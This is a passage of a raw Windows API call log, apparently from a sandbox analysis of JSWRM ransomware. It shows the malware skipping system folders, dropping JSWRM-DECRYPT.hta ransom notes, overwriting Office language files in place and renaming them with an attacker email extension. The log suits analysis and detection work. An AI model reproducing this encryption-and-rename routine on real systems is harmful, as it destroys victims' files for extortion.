(in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.232] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5890, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5890, lpOverlapped=0x0) returned 1 [0136.235] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.235] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5890, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5890, lpOverlapped=0x0) returned 1 [0136.235] CloseHandle (hObject=0x314) returned 1 [0136.236] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ca\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ca\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ca\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ca\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.237] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56853a0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56853a0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x56853a0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5898, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.237] FindClose (in: hFindFile=0x231ec0 | out: hFindFile=0x231ec0) returned 1 [0136.237] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf803d796, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf803d796, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf803d796, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="cs", cAlternateFileName="")) returned 1 [0136.237] lstrcmpiW (lpString1="cs", lpString2=".") returned 1 [0136.237] lstrcmpiW (lpString1="cs", lpString2="..") returned 1 [0136.237] lstrcmpiW (lpString1="cs", lpString2="...") returned 1 [0136.237] lstrcmpiW (lpString1="cs", lpString2="windows") returned -1 [0136.237] lstrcmpiW (lpString1="cs", lpString2="recovery") returned -1 [0136.237] lstrcmpiW (lpString1="cs", lpString2="perflogs") returned -1 [0136.237] lstrcmpiW (lpString1="cs", lpString2="documents and settings") returned -1 [0136.237] lstrcmpiW (lpString1="cs", lpString2="$RECYCLE.BIN") returned 1 [0136.237] lstrcmpiW (lpString1="cs", lpString2="system volume information") returned -1 [0136.237] lstrcmpiW (lpString1="cs", lpString2="msocache") returned -1 [0136.237] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\cs\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\cs\\jswrm-decrypt.hta")) returned 0xffffffff [0136.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.238] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\cs\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\cs\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.239] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.239] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.240] CloseHandle (hObject=0x238) returned 1 [0136.240] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\cs\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\cs\\jswrm-decrypt.hta")) returned 0x20 [0136.240] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\cs\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf803d796, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf803d796, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x47deb159, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0136.240] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.240] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf803d796, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf803d796, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x47deb159, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.240] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.240] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.240] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47deb159, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x47deb159, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x47deb159, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.240] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.240] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.240] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.240] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.240] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.240] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.241] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.241] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.241] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.241] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f98, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.241] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf803d796, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf803d796, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf803d796, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.241] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.241] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.241] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.241] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.241] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.241] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.241] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.241] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.241] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.241] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.241] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\cs\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\cs\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.242] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21144) returned 1 [0136.242] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.242] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5290, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5290, lpOverlapped=0x0) returned 1 [0136.245] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.245] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5290, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5290, lpOverlapped=0x0) returned 1 [0136.245] CloseHandle (hObject=0x314) returned 1 [0136.245] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\cs\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\cs\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\cs\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\cs\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.246] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf803d796, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf803d796, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf803d796, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.246] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0136.246] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6165f55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6165f55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6165f55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="da", cAlternateFileName="")) returned 1 [0136.246] lstrcmpiW (lpString1="da", lpString2=".") returned 1 [0136.246] lstrcmpiW (lpString1="da", lpString2="..") returned 1 [0136.246] lstrcmpiW (lpString1="da", lpString2="...") returned 1 [0136.246] lstrcmpiW (lpString1="da", lpString2="windows") returned -1 [0136.246] lstrcmpiW (lpString1="da", lpString2="recovery") returned -1 [0136.246] lstrcmpiW (lpString1="da", lpString2="perflogs") returned -1 [0136.246] lstrcmpiW (lpString1="da", lpString2="documents and settings") returned -1 [0136.246] lstrcmpiW (lpString1="da", lpString2="$RECYCLE.BIN") returned 1 [0136.246] lstrcmpiW (lpString1="da", lpString2="system volume information") returned -1 [0136.246] lstrcmpiW (lpString1="da", lpString2="msocache") returned -1 [0136.246] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\da\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\da\\jswrm-decrypt.hta")) returned 0xffffffff [0136.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\da\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\da\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.247] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.247] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.248] CloseHandle (hObject=0x238) returned 1 [0136.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\da\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\da\\jswrm-decrypt.hta")) returned 0x20 [0136.249] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\da\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6165f55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6165f55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x47deb159, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x231c40 [0136.249] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.249] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6165f55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6165f55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x47deb159, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.249] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.249] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.249] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47deb159, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x47deb159, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x47deb159, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.249] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.249] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.249] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6165f55, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6165f55, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6165f55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5498, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.250] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.250] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.250] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.250] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.250] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.250] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.250] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.250] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.250] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.250] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.250] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\da\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\da\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.251] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21656) returned 1 [0136.251] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.251] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5490, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5490, lpOverlapped=0x0) returned 1 [0136.254] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.254] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5490, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5490, lpOverlapped=0x0) returned 1 [0136.254] CloseHandle (hObject=0x314) returned 1 [0136.254] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft 